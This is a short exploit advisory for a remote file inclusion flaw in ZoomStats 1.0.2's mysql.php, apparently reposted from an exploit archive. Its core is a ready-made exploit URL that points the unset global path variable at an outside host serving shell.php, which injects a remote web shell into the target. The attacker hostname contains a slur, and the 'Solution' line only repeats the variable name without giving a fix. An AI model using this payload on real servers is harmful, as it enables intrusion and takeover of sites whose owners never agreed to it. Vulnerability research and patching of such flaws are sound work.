id: 879
date: 09/24/2006
title: ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability
author: Drago84
cves: 

================================================================
ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability
================================================================


###### ToXiC #########################
#
#BuG FounD  by Drago84
#
#Application Affect:ZoomStats
#Problem:
#$GLOBALS['lib']['db']['path'] array not declare
#Solution : $GLOBALS['lib']['db']['path']
#Page Vulnerable : mysql.php
#Dir Page: /libs/dbmax/
# Exempe Of ExPloit is:
#http://www.site.com/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://marcusbestlamer.gay/shell.php?
#GrEatZ All Member of ToXiC, Str0ke
# ToXic Security
###### ToXiC ###Drago84###############



#  0day.today [2023-03-24]  #